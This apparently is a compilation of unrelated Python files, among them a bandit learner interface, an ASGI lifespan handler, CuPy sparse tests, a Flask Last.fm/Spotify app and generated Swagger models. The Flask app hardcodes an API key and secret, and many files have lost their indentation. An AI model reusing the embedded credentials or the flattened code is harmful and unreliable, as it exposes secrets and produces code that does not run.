This value is used for descriptive purposes only when creating benchmark results.
"""
...
@abstractmethod
def predict(self, key: Key, context: Context, actions: Sequence[Action]) -> Sequence[float]:
"""Determine a PMF with which to select the given actions.
Args:
key: A unique identifier for the interaction that the observed reward
came from. This identifier allows learners to share information
between the choose and learn methods while still keeping the overall
learner interface consistent and clean.
context: The current context. This argument will be None when playing
a multi-armed bandit simulation and will contain context features
when playing a contextual bandit simulation. Context features could
be an individual number (e.g. 1.34), a string (e.g., "hot"), or a
tuple of strings and numbers (e.g., (1.34, "hot")) depending on the
simulation being played.
actions: The current set of actions to choose from in the given context.
Action sets can be lists of numbers (e.g., [1,2,3,4]), a list of
strings (e.g. ["high", "medium", "low"]), or a list of tuples such
as in the case of movie recommendations (e.g., [("action", "oscar"),
("fantasy", "razzie")]).
Returns:
A sequence of probabilities indicating the probability of taking each action.
"""
...
@abstractmethod
def learn(self, key: Key, context: Context, action: Action, reward: float, probability: float) -> Optional[Dict[str,Any]]:
"""Learn about the result of an action that was taken in a context.
Args:
key: A unique identifier for the interaction that the observed reward
came from. This identifier allows learners to share information
between the choose and learn methods while still keeping the overall
learner interface consistent and clean.
context: The current context. This argument will be None when playing
a multi-armed bandit simulation and will contain context features
when playing a contextual bandit simulation. Context features could
be an individual number (e.g. 1.34), a string (e.g., "hot"), or a
tuple of strings and numbers (e.g., (1.34, "hot")) depending on the
simulation being played.
action: The action that was selected to play and observe its reward.
An Action can be an individual number (e.g., 2), a string (e.g.
"medium"), or a list of some combination of numbers or strings
(e.g., ["action", "oscar"]).
reward: The reward received for taking the given action in the given context.
            probability: The probability with which the given action was selected.
"""
...
def __reduce__(self) -> Union[str, Tuple[Any, ...]]:
"""An optional method that can be overridden for Learner implimentations that are not picklable by default."""
return super().__reduce__()
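# Illustrative sketch (an addition, not part of the original interface): a
# uniform-random learner showing the minimal contract -- `predict` returns a
# PMF over the given actions and `learn` may ignore the feedback entirely.
class UniformRandomLearner(Learner):
    """A learner that selects actions uniformly at random and never updates."""

    @property
    def family(self) -> str:
        return "uniform_random"

    @property
    def params(self) -> Dict[str, Any]:
        return {}

    def predict(self, key: Key, context: Context, actions: Sequence[Action]) -> Sequence[float]:
        # A uniform PMF over the available actions.
        return [1 / len(actions)] * len(actions)

    def learn(self, key: Key, context: Context, action: Action, reward: float, probability: float) -> Optional[Dict[str, Any]]:
        # Nothing to update for a non-adaptive policy.
        return None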
|
try:
from unittest import mock
except ImportError:
import mock
from rest_framework import status
from rest_framework.reverse import reverse
url = reverse("rest-email-auth:password-reset")
@mock.patch(
"rest_email_auth.views.serializers.PasswordResetSerializer.save",
autospec=True,
)
def test_request_reset(mock_save, api_client, password_reset_token_factory):
"""
Sending a POST request with valid data to the view should reset the
user's password.
"""
token = password_reset_token_factory()
data = {"key": token.key, "password": "new_passw0rd"}
response = api_client.post(url, data)
assert response.status_code == status.HTTP_200_OK
assert mock_save.call_count == 1
|
from .capeval.cider import Cider
|
import asyncio
import logging
import types
import typing
import enum
from dataclasses import dataclass
from ..types import ASGIApp, Message
from ..exceptions import LifespanUnsupported, LifespanFailure, UnexpectedMessage
class LifespanCycleState(enum.Enum):
"""
The state of the ASGI `lifespan` connection.
* **CONNECTING** - Initial state. The ASGI application instance will be run with
the connection scope containing the `lifespan` type.
* **STARTUP** - The lifespan startup event has been pushed to the queue to be
received by the application.
* **SHUTDOWN** - The lifespan shutdown event has been pushed to the queue to be
received by the application.
* **FAILED** - A lifespan failure has been detected, and the connection will be
closed with an error.
* **UNSUPPORTED** - An application attempted to send a message before receiving
    the lifespan startup event. If the lifespan argument is "on", then the connection
will be closed with an error.
"""
CONNECTING = enum.auto()
STARTUP = enum.auto()
SHUTDOWN = enum.auto()
FAILED = enum.auto()
UNSUPPORTED = enum.auto()
@dataclass
class LifespanCycle:
"""
Manages the application cycle for an ASGI `lifespan` connection.
* **app** - An asynchronous callable that conforms to version 3.0 of the ASGI
specification. This will usually be an ASGI framework application instance.
* **lifespan** - A string to configure lifespan support. Choices are `auto`, `on`,
and `off`. Default is `auto`.
* **state** - An enumerated `LifespanCycleState` type that indicates the state of
the ASGI connection.
* **exception** - An exception raised while handling the ASGI event.
* **app_queue** - An asyncio queue (FIFO) containing messages to be received by the
application.
* **startup_event** - An asyncio event object used to control the application
startup flow.
* **shutdown_event** - An asyncio event object used to control the application
shutdown flow.
* **exception** - An exception raised while handling the ASGI event. This may or
may not be raised depending on the state.
"""
app: ASGIApp
lifespan: str
state: LifespanCycleState = LifespanCycleState.CONNECTING
exception: typing.Optional[BaseException] = None
def __post_init__(self) -> None:
self.logger = logging.getLogger("mangum.lifespan")
self.loop = asyncio.get_event_loop()
self.app_queue: asyncio.Queue = asyncio.Queue()
self.startup_event: asyncio.Event = asyncio.Event()
self.shutdown_event: asyncio.Event = asyncio.Event()
def __enter__(self) -> None:
"""
Runs the event loop for application startup.
"""
self.loop.create_task(self.run())
self.loop.run_until_complete(self.startup())
def __exit__(
self,
exc_type: typing.Optional[typing.Type[BaseException]],
exc_value: typing.Optional[BaseException],
traceback: typing.Optional[types.TracebackType],
) -> None:
"""
Runs the event loop for application shutdown.
"""
self.loop.run_until_complete(self.shutdown())
async def run(self) -> None:
"""
Calls the application with the `lifespan` connection scope.
"""
try:
await self.app({"type": "lifespan"}, self.receive, self.send)
except LifespanUnsupported:
self.logger.info("ASGI 'lifespan' protocol appears unsupported.")
except (LifespanFailure, UnexpectedMessage) as exc:
self.exception = exc
except BaseException as exc:
self.logger.error("Exception in 'lifespan' protocol.", exc_info=exc)
finally:
self.startup_event.set()
self.shutdown_event.set()
async def receive(self) -> Message:
"""
Awaited by the application to receive ASGI `lifespan` events.
"""
if self.state is LifespanCycleState.CONNECTING:
# Connection established. The next event returned by the queue will be
# `lifespan.startup` to inform the application that the connection is
            # ready to receive lifespan messages.
self.state = LifespanCycleState.STARTUP
elif self.state is LifespanCycleState.STARTUP:
# Connection shutting down. The next event returned by the queue will be
# `lifespan.shutdown` to inform the application that the connection is now
# closing so that it may perform cleanup.
self.state = LifespanCycleState.SHUTDOWN
return await self.app_queue.get()
async def send(self, message: Message) -> None:
"""
Awaited by the application to send ASGI `lifespan` events.
"""
message_type = message["type"]
self.logger.info(
"%s: '%s' event received from application.", self.state, message_type
)
if self.state is LifespanCycleState.CONNECTING:
if self.lifespan == "on":
raise LifespanFailure(
"Lifespan connection failed during startup and lifespan is 'on'."
)
# If a message is sent before the startup event is received by the
# application, then assume that lifespan is unsupported.
self.state = LifespanCycleState.UNSUPPORTED
raise LifespanUnsupported("Lifespan protocol appears unsupported.")
if message_type not in (
"lifespan.startup.complete",
"lifespan.shutdown.complete",
"lifespan.startup.failed",
"lifespan.shutdown.failed",
):
self.state = LifespanCycleState.FAILED
raise UnexpectedMessage(f"Unexpected '{message_type}' event received.")
if self.state is LifespanCycleState.STARTUP:
if message_type == "lifespan.startup.complete":
self.startup_event.set()
elif message_type == "lifespan.startup.failed":
self.state = LifespanCycleState.FAILED
self.startup_event.set()
message = message.get("message", "")
raise LifespanFailure(f"Lifespan startup failure. {message}")
elif self.state is LifespanCycleState.SHUTDOWN:
if message_type == "lifespan.shutdown.complete":
self.shutdown_event.set()
elif message_type == "lifespan.shutdown.failed":
self.state = LifespanCycleState.FAILED
self.shutdown_event.set()
message = message.get("message", "")
raise LifespanFailure(f"Lifespan shutdown failure. {message}")
async def startup(self) -> None:
"""
Pushes the `lifespan` startup event to application queue and handles errors.
"""
self.logger.info("Waiting for application startup.")
await self.app_queue.put({"type": "lifespan.startup"})
await self.startup_event.wait()
if self.state is LifespanCycleState.FAILED:
raise LifespanFailure(self.exception)
if not self.exception:
self.logger.info("Application startup complete.")
else:
self.logger.info("Application startup failed.")
async def shutdown(self) -> None:
"""
Pushes the `lifespan` shutdown event to application queue and handles errors.
"""
self.logger.info("Waiting for application shutdown.")
await self.app_queue.put({"type": "lifespan.shutdown"})
await self.shutdown_event.wait()
if self.state is LifespanCycleState.FAILED:
raise LifespanFailure(self.exception)
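# Minimal usage sketch (assumed, for illustration only): the cycle is meant to
# be used as a synchronous context manager so that startup runs on __enter__
# and shutdown on __exit__. `app` stands for any ASGI 3.0 callable; "auto"
# mirrors the documented default of the `lifespan` argument.
#
#     cycle = LifespanCycle(app, "auto")
#     with cycle:
#         ...  # handle events while the application is "running"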
|
from gii.core import *
from gii.moai.MOAIEditCanvas import MOAIEditCanvas
from gii.AssetEditor import AssetPreviewer
from gii.qt.helpers import addWidgetWithLayout
from PyQt4 import uic
from PyQt4 import QtGui
def _getModulePath( path ):
import os.path
return os.path.dirname( __file__ ) + '/' + path
class FModPreviewer(AssetPreviewer):
def createWidget(self, container):
self.container = uic.loadUi( _getModulePath('FModPreview.ui') )
self.canvas = addWidgetWithLayout(
MOAIEditCanvas(container),
self.container.canvasContainer
)
self.canvas.loadScript( _getModulePath('FModPreview.lua') )
return self.container
def accept(self, assetNode):
        return assetNode.getType() in ('fmod_event',)
def onStart(self, assetNode):
atype=assetNode.getType()
self.canvas.safeCallMethod( 'preview', 'setEvent', assetNode.getPath() )
def onStop(self):
self.canvas.safeCallMethod( 'preview', 'setEvent', None )
FModPreviewer().register()
|
# Build Single Element
#
# Create an OpenMC model of just a single lonely fuel element
import numpy
import openmc
import sys; sys.path.append('../..')
import treat
class SingleFuelElementBuilder(treat.CoreBuilder):
def __init__(self, material_lib, name="Single Fuel Element"):
super().__init__(material_lib, 1, name)
self.bc = ["reflective"]*4
def _populate_core_lattice(self):
# 2D active fuel element
fuel_layer = treat.elements.common_layers.get_fuel_layer(
self.manager, self.material_lib)
fuel2d = treat.elements.Element2D.fromLayer(fuel_layer).universe
fuel2d.name = "Fuel 2D"
self.lattice.universes = numpy.array([[fuel2d]], dtype=openmc.Universe)
self._lattice_is_populated = True
if __name__ == "__main__":
library = treat.materials.get_library("NRL")
elem = SingleFuelElementBuilder(library)
elem.lattice.export_to_xml(elem.bc, elem.axially_finite)
|
import unittest
from context import src
from context import config
class TestEnvironment(unittest.TestCase):
def setUp(self):
self.env = src.simulation.environment.Environment(config)
def test_instance(self):
self.assertIsNotNone(self.env)
def test_add_patch(self):
self.env.add_patch()
self.assertIsNotNone(self.env.children)
self.assertTrue(len(self.env.children) > 0)
self.assertIsNotNone(self.env.children[0])
def test_patch_location(self):
for i in range(100):
x, y = self.env.patch_location(10.0)
self.assertTrue((x >= 0.0) and (x <= self.env.length))
self.assertTrue(y >= 0.0 and y <= self.env.width)
def test_create_patches(self):
self.env.children = []
self.env.create_patches()
self.assertGreaterEqual(len(self.env.children), config.getint("ENVIRONMENT", "min_patches"))
self.assertLessEqual(len(self.env.children), config.getint("ENVIRONMENT", "max_patches"))
|
#
# Copyright (C) 2020 IBM. All Rights Reserved.
#
# See LICENSE.txt file in the root directory
# of this source tree for licensing information.
#
import json
import os
from clai.emulator.emulator_docker_bridge import EmulatorDockerBridge
# pylint: disable=too-many-instance-attributes
from clai.server.command_runner.clai_last_info_command_runner import InfoDebug
class EmulatorPresenter:
def __init__(self, emulator_docker_bridge: EmulatorDockerBridge, on_skills_ready, on_server_running,
on_server_stopped):
self.server_running = False
self.server_process = None
self.current_active_skill = ''
self.emulator_docker_bridge = emulator_docker_bridge
self.on_skills_ready = on_skills_ready
self.on_server_running = on_server_running
self.on_server_stopped = on_server_stopped
self.log_value = ""
self.log_read = None
@staticmethod
def __get_base_path():
root_path = os.getcwd()
if 'bin' in root_path:
return '../'
return '.'
def select_skill(self, skill_name: str):
if skill_name == self.current_active_skill:
return
self._send_select(skill_name)
self._send_unselect(self.current_active_skill)
self.request_skills()
def request_skills(self):
self.emulator_docker_bridge.request_skills()
def send_message(self, message):
self.emulator_docker_bridge.send_message(message)
def attach_log(self, chunked_read):
self.log_read = chunked_read
def _send_select(self, skill_name: str):
self.emulator_docker_bridge.select_skill(skill_name)
def _send_unselect(self, skill_name: str):
self.emulator_docker_bridge.unselect_skill(skill_name)
def run_server(self):
self.emulator_docker_bridge.start()
self.server_running = True
self.on_server_running()
self.request_skills()
def stop_server(self):
print(f'is server running {self.server_running}')
if self.server_running:
self.emulator_docker_bridge.stop_server()
self.server_running = False
self.on_server_stopped()
def refresh_files(self):
self.emulator_docker_bridge.refresh_files()
def retrieve_messages(self, add_row):
reply = self.emulator_docker_bridge.retrieve_message()
if reply:
if reply.docker_reply == 'skills':
skills_as_array = reply.message.splitlines()
self.on_skills_ready(skills_as_array[2:-1])
elif reply.docker_reply == 'reply_message':
info_as_string = reply.info[reply.info.index('{'):]
info_as_string = info_as_string[:info_as_string.index('\n')]
print(f"----> {info_as_string}")
info = InfoDebug(**json.loads(info_as_string))
add_row(reply.message, info)
elif reply.docker_reply == 'log':
self.log_value = self.extract_chunk_log(self.log_value, reply.message)
if self.log_read:
self.log_read(self.log_value)
else:
print(f"-----> {reply.docker_reply} : {reply.message}")
@staticmethod
def extract_chunk_log(log_value, message):
if not message:
return ''
log_as_list = log_value.split('\n')
message_as_list = message.split('\n')
new_log = []
        if message_as_list[0] in log_as_list:
index = log_as_list.index(message_as_list[0])
new_log = message_as_list[(len(log_as_list) - index - 1):]
else:
new_log = message_as_list
return '\n'.join(new_log)
|
import functools
import re
from unittest import mock
import numpy
import pytest
try:
import scipy.sparse
scipy_available = True
except ImportError:
scipy_available = False
import cupy
from cupy import testing
from cupy.cuda import runtime
from cupyx.scipy import sparse
from cupyx.scipy.sparse import _construct
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'format': ['csr', 'csc', 'coo'],
'm': [3],
'n': [None, 3, 2],
'k': [0, 1],
}))
@testing.with_requires('scipy')
class TestEye:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_eye(self, xp, sp):
x = sp.eye(
self.m, n=self.n, k=self.k, dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'format': ['csr', 'csc', 'coo'],
}))
@testing.with_requires('scipy')
class TestIdentity:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_eye(self, xp, sp):
x = sp.identity(3, dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
}))
@testing.with_requires('scipy')
class TestSpdiags:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_spdiags(self, xp, sp):
data = xp.arange(12, dtype=self.dtype).reshape(3, 4)
diags = xp.array([0, -1, 2], dtype='i')
x = sp.spdiags(data, diags, 3, 4)
return x
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64]
}))
class TestVstack:
def data(self):
A = sparse.coo_matrix((cupy.asarray([1.0, 2.0, 3.0, 4.0]),
(cupy.asarray([0, 0, 1, 1]),
cupy.asarray([0, 1, 0, 1]))))
B = sparse.coo_matrix((cupy.asarray([5.0, 6.0]),
(cupy.asarray([0, 0]),
cupy.asarray([0, 1]))))
return A, B
def expected(self):
return cupy.asarray([[1, 2],
[3, 4],
[5, 6]], self.dtype)
def test_basic_vstack(self):
A, B = self.data()
actual = _construct.vstack([A, B]).todense()
testing.assert_array_equal(actual, self.expected())
def test_dtype(self):
A, B = self.data()
actual = _construct.vstack([A, B], dtype=self.dtype)
assert actual.dtype == self.dtype
def test_csr(self):
A, B = self.data()
actual = _construct.vstack([A.tocsr(), B.tocsr()]).todense()
testing.assert_array_equal(actual, self.expected())
def test_csr_with_dtype(self):
A, B = self.data()
actual = _construct.vstack([A.tocsr(), B.tocsr()],
dtype=self.dtype)
assert actual.dtype == self.dtype
assert actual.indices.dtype == cupy.int32
assert actual.indptr.dtype == cupy.int32
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64]
}))
class TestHstack:
def data(self):
A = sparse.coo_matrix((cupy.asarray([1.0, 2.0, 3.0, 4.0]),
(cupy.asarray([0, 0, 1, 1]),
cupy.asarray([0, 1, 0, 1]))))
B = sparse.coo_matrix((cupy.asarray([5.0, 6.0]),
(cupy.asarray([0, 1]),
cupy.asarray([0, 0]))))
return A, B
def expected(self):
return cupy.asarray([[1, 2, 5],
[3, 4, 6]])
def test_basic_hstack(self):
A, B = self.data()
actual = _construct.hstack([A, B], dtype=self.dtype).todense()
testing.assert_array_equal(actual, self.expected())
assert actual.dtype == self.dtype
def test_csc(self):
A, B = self.data()
actual = _construct.hstack([A.tocsc(), B.tocsc()],
dtype=self.dtype).todense()
testing.assert_array_equal(actual, self.expected())
assert actual.dtype == self.dtype
def test_csc_with_dtype(self):
A, B = self.data()
actual = _construct.hstack([A.tocsc(), B.tocsc()],
dtype=self.dtype)
assert actual.indices.dtype == cupy.int32
assert actual.indptr.dtype == cupy.int32
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64]
}))
class TestBmat:
def data(self):
A = sparse.csr_matrix(cupy.asarray([[1, 2], [3, 4]],
self.dtype)).tocoo()
B = sparse.csr_matrix(cupy.asarray([[5], [6]],
self.dtype)).tocoo()
C = sparse.csr_matrix(cupy.asarray([[7]],
self.dtype)).tocoo()
D = sparse.coo_matrix((0, 0), dtype=self.dtype)
return A, B, C, D
def test_basic_inputs(self):
A, B, C, D = self.data()
expected = cupy.asarray([[1, 2, 5],
[3, 4, 6],
[0, 0, 7]], dtype=self.dtype)
testing.assert_array_equal(
_construct.bmat([[A, B], [None, C]]).todense(), expected
)
expected = cupy.asarray([[1, 2, 0],
[3, 4, 0],
[0, 0, 7]])
testing.assert_array_equal(
_construct.bmat([[A, None], [None, C]]).todense(), expected
)
expected = cupy.asarray([[0, 5],
[0, 6],
[7, 0]])
testing.assert_array_equal(
_construct.bmat([[None, B], [C, None]]).todense(), expected
)
def test_empty(self):
A, B, C, D = self.data()
expected = cupy.empty((0, 0), dtype=self.dtype)
testing.assert_array_equal(_construct.bmat([[None, None]]).todense(),
expected)
testing.assert_array_equal(_construct.bmat([[None, D], [D, None]])
.todense(), expected)
def test_edge_cases(self):
"""Catch-all for small edge cases"""
A, B, C, D = self.data()
expected = cupy.asarray([[7]], dtype=self.dtype)
testing.assert_array_equal(_construct.bmat([[None, D], [C, None]])
.todense(), expected)
def test_failure_cases(self):
A, B, C, D = self.data()
match = r'.*Got blocks\[{}\]\.shape\[{}\] == 1, expected 2'
# test failure cases
message1 = re.compile(match.format('1,0', '1'))
with pytest.raises(ValueError, match=message1):
_construct.bmat([[A], [B]], dtype=self.dtype)
message2 = re.compile(match.format('0,1', '0'))
with pytest.raises(ValueError, match=message2):
_construct.bmat([[A, C]], dtype=self.dtype)
@testing.parameterize(*testing.product({
'random_method': ['random', 'rand'],
'dtype': [numpy.float32, numpy.float64],
'format': ['csr', 'csc', 'coo'],
}))
class TestRandom:
def test_random(self):
x = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
def test_random_with_seed(self):
x = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=1)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
y = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=1)
testing.assert_array_equal(x.toarray(), y.toarray())
def test_random_with_state(self):
state1 = cupy.random.RandomState(1)
x = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=state1)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
state2 = cupy.random.RandomState(1)
y = getattr(sparse, self.random_method)(
3, 4, density=0.1,
format=self.format, dtype=self.dtype,
random_state=state2)
testing.assert_array_equal(x.toarray(), y.toarray())
def test_random_with_data_rvs(self):
if self.random_method == 'rand':
pytest.skip('cupyx.scipy.sparse.rand does not support data_rvs')
data_rvs = mock.MagicMock(side_effect=cupy.zeros)
x = getattr(sparse, self.random_method)(
3, 4, density=0.1, data_rvs=data_rvs,
format=self.format, dtype=self.dtype)
assert x.shape == (3, 4)
assert x.dtype == self.dtype
assert x.format == self.format
assert data_rvs.call_count == 1
# Note that its value is generated randomly
assert isinstance(data_rvs.call_args[0][0], int)
@testing.with_requires('scipy')
class TestRandomInvalidArgument:
def test_too_small_density(self):
for sp in (scipy.sparse, sparse):
with pytest.raises(ValueError):
sp.random(3, 4, density=-0.1)
def test_too_large_density(self):
for sp in (scipy.sparse, sparse):
with pytest.raises(ValueError):
sp.random(3, 4, density=1.1)
def test_invalid_dtype(self):
# Note: SciPy 1.12+ accepts integer.
with pytest.raises(NotImplementedError):
sparse.random(3, 4, dtype='i')
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'format': ['dia', 'csr', 'csc', 'coo'],
}))
@testing.with_requires('scipy')
class TestDiags:
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_scalar_offset(self, xp, sp):
x = sp.diags(
xp.arange(16), offsets=0, dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_single_element_lists(self, xp, sp):
x = sp.diags(
[xp.arange(16)], offsets=[0], dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_multiple(self, xp, sp):
x = sp.diags(
[xp.arange(15), xp.arange(16), xp.arange(15), xp.arange(13)],
offsets=[-1, 0, 1, 3],
dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_offsets_as_array(self, xp, sp):
x = sp.diags(
[xp.arange(15), xp.arange(16), xp.arange(15), xp.arange(13)],
offsets=xp.array([-1, 0, 1, 3]),
dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
@testing.numpy_cupy_allclose(sp_name='sp')
def test_diags_non_square(self, xp, sp):
x = sp.diags(
[xp.arange(5), xp.arange(3)],
offsets=[0, -2], shape=(5, 10),
dtype=self.dtype, format=self.format)
assert isinstance(x, sp.spmatrix)
assert x.format == self.format
return x
# borrowed from scipy:
_arrs_kron = [
[[0]],
[[-1]],
[[4]],
[[10]],
[[0], [0]],
[[0, 0]],
[[1, 2], [3, 4]],
[[0, 2], [5, 0]],
[[0, 2, -6], [8, 0, 14]],
[[5, 4], [0, 0], [6, 0]],
[[5, 4, 4], [1, 0, 0], [6, 0, 8]],
[[0, 1, 0, 2, 0, 5, 8]],
[[0.5, 0.125, 0, 3.25], [0, 2.5, 0, 0]], ]
def skip_HIP_0_size_matrix():
def decorator(impl):
@functools.wraps(impl)
def test_func(self, *args, **kw):
try:
impl(self, *args, **kw)
except AssertionError as e:
if runtime.is_hip:
assert 'ValueError: hipSPARSE' in str(e)
pytest.xfail('may be buggy')
raise
return test_func
return decorator
@testing.parameterize(*testing.product({
'dtype': (numpy.float32, numpy.float64, numpy.complex64, numpy.complex128),
'format': ('csr', 'csc', 'coo'),
'arrA': _arrs_kron,
'arrB': _arrs_kron,
}))
@testing.with_requires('scipy>=1.6')
class TestKron:
def _make_sp_mat(self, xp, sp, arr, dtype):
a = xp.array(arr, dtype=dtype)
a = sp.csr_matrix(a)
return a
@skip_HIP_0_size_matrix()
@testing.numpy_cupy_allclose(sp_name='sp')
def test_kron(self, xp, sp):
a = self._make_sp_mat(xp, sp, self.arrA, self.dtype)
b = self._make_sp_mat(xp, sp, self.arrB, self.dtype)
kron = sp.kron(a, b, format=self.format)
assert kron.shape == (a.shape[0] * b.shape[0], a.shape[1] * b.shape[1])
assert kron.nnz == a.nnz * b.nnz
return kron
# TODO(leofang): check oversize inputs as in scipy/scipy#11879 after
# #3513 is fixed
_arrs_kronsum = [
[[0]],
[[-1]],
[[4]],
[[10]],
[[1, 2], [3, 4]],
[[0, 2], [5, 0]],
[[0, 2, -6], [8, 0, 14], [0, 3, 0]],
[[5, 4, 4], [1, 0, 0], [6, 0, 8]]]
@testing.parameterize(*testing.product({
'dtype': (numpy.float32, numpy.float64, numpy.complex64, numpy.complex128),
'format': ('csr', 'csc', 'coo'),
'arrA': _arrs_kronsum,
'arrB': _arrs_kronsum,
}))
@testing.with_requires('scipy>=1.6')
class TestKronsum:
def _make_sp_mat(self, xp, sp, arr, dtype):
a = xp.array(arr, dtype=dtype)
a = sp.csr_matrix(a)
return a
@skip_HIP_0_size_matrix()
@testing.numpy_cupy_allclose(sp_name='sp')
def test_kronsum(self, xp, sp):
a = self._make_sp_mat(xp, sp, self.arrA, self.dtype)
b = self._make_sp_mat(xp, sp, self.arrB, self.dtype)
kronsum = sp.kronsum(a, b, format=self.format)
assert kronsum.shape == (a.shape[0] * b.shape[0],
a.shape[1] * b.shape[1])
return kronsum
|
from datetime import datetime
from flask import Flask, render_template
import json
import requests
from spotify_api.api import SpotifyApi
app = Flask(__name__)
s_api = SpotifyApi()
LASTFM_API_KEY = "b9ba81a4f80bbff4fa3fcf7df609947e"
LASTFM_API_SECRET = "65f9cf1308e52e3369c5eeb992fa846a"
def getRecentTracks(user):
url = "http://ws.audioscrobbler.com/2.0/"
payload = {"api_key": LASTFM_API_KEY,
"method": "user.getrecenttracks",
"user": user,
"format": "json"}
response = requests.get(url, params = payload)
app.logger.debug(response.url)
if response.status_code != 200:
raise Exception("Panic! Cannot call lastfm user.getrecentracks!")
#process response
data = json.loads(response.text)
return data['recenttracks']['track']
def isArtistOfAlbum(spotify_album, artist_name):
for a in spotify_album.artists:
if a.name == artist_name:
return True
return False
def getSpotifyLink(album_name, artist_name):
"""
album_name: str
artist_name: str
"""
#TODO: Use advanced search
#Search for albums in Spotify
albums = s_api.albums.search(album_name)
#Look in search results for best first fit
for album in albums:
if isArtistOfAlbum(album, artist_name):
return album.href
print "Unknown for: %s" % (album_name)
return "Unknown"
@app.route("/<username>")
def index(username):
#get recent tracks of user
app.logger.debug("Get recent tracks from user... %d" % datetime.now().second)
tracks = getRecentTracks(username)
#get unique album names
albums = dict()
for track in tracks:
try:
albums[track['album']['#text']] = track['artist']['#text']
        except (AttributeError, KeyError):
pass
#Get Spotify links and collect data
app.logger.debug("Look for Spotify links... %d" % datetime.now().second)
album_data = [(album_name, getSpotifyLink(album_name, artist_name))
for album_name, artist_name
in albums.items()]
    print(album_data)
app.logger.debug("Render template... %d" % datetime.now().second)
return render_template("index.html", albums = album_data)
if __name__=="__main__":
app.run(debug = True)
|
# coding: utf-8
"""
syntropy-controller
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class GetAgentsRequestFilterV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
"agent_id": "list[float]",
"agent_provider_name": "list[str]",
"agent_type": "list[GetAgentsRequestFilterAgentTypeV1]",
"agent_version": "list[str]",
"agent_tag_name": "list[str]",
"agent_status": "list[GetAgentsRequestFilterAgentStatusV1]",
"agent_location_country": "list[str]",
"agent_modified_at_from": "datetime",
"agent_modified_at_to": "datetime",
}
attribute_map = {
"agent_id": "agent_id",
"agent_provider_name": "agent_provider_name",
"agent_type": "agent_type",
"agent_version": "agent_version",
"agent_tag_name": "agent_tag_name",
"agent_status": "agent_status",
"agent_location_country": "agent_location_country",
"agent_modified_at_from": "agent_modified_at_from",
"agent_modified_at_to": "agent_modified_at_to",
}
def __init__(
self,
agent_id=None,
agent_provider_name=None,
agent_type=None,
agent_version=None,
agent_tag_name=None,
agent_status=None,
agent_location_country=None,
agent_modified_at_from=None,
agent_modified_at_to=None,
): # noqa: E501
"""GetAgentsRequestFilterV1 - a model defined in Swagger""" # noqa: E501
self._agent_id = None
self._agent_provider_name = None
self._agent_type = None
self._agent_version = None
self._agent_tag_name = None
self._agent_status = None
self._agent_location_country = None
self._agent_modified_at_from = None
self._agent_modified_at_to = None
self.discriminator = None
if agent_id is not None:
self.agent_id = agent_id
if agent_provider_name is not None:
self.agent_provider_name = agent_provider_name
if agent_type is not None:
self.agent_type = agent_type
if agent_version is not None:
self.agent_version = agent_version
if agent_tag_name is not None:
self.agent_tag_name = agent_tag_name
if agent_status is not None:
self.agent_status = agent_status
if agent_location_country is not None:
self.agent_location_country = agent_location_country
if agent_modified_at_from is not None:
self.agent_modified_at_from = agent_modified_at_from
if agent_modified_at_to is not None:
self.agent_modified_at_to = agent_modified_at_to
@property
def agent_id(self):
"""Gets the agent_id of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_id of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[float]
"""
return self._agent_id
@agent_id.setter
def agent_id(self, agent_id):
"""Sets the agent_id of this GetAgentsRequestFilterV1.
:param agent_id: The agent_id of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[float]
"""
self._agent_id = agent_id
@property
def agent_provider_name(self):
"""Gets the agent_provider_name of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_provider_name of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_provider_name
@agent_provider_name.setter
def agent_provider_name(self, agent_provider_name):
"""Sets the agent_provider_name of this GetAgentsRequestFilterV1.
:param agent_provider_name: The agent_provider_name of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_provider_name = agent_provider_name
@property
def agent_type(self):
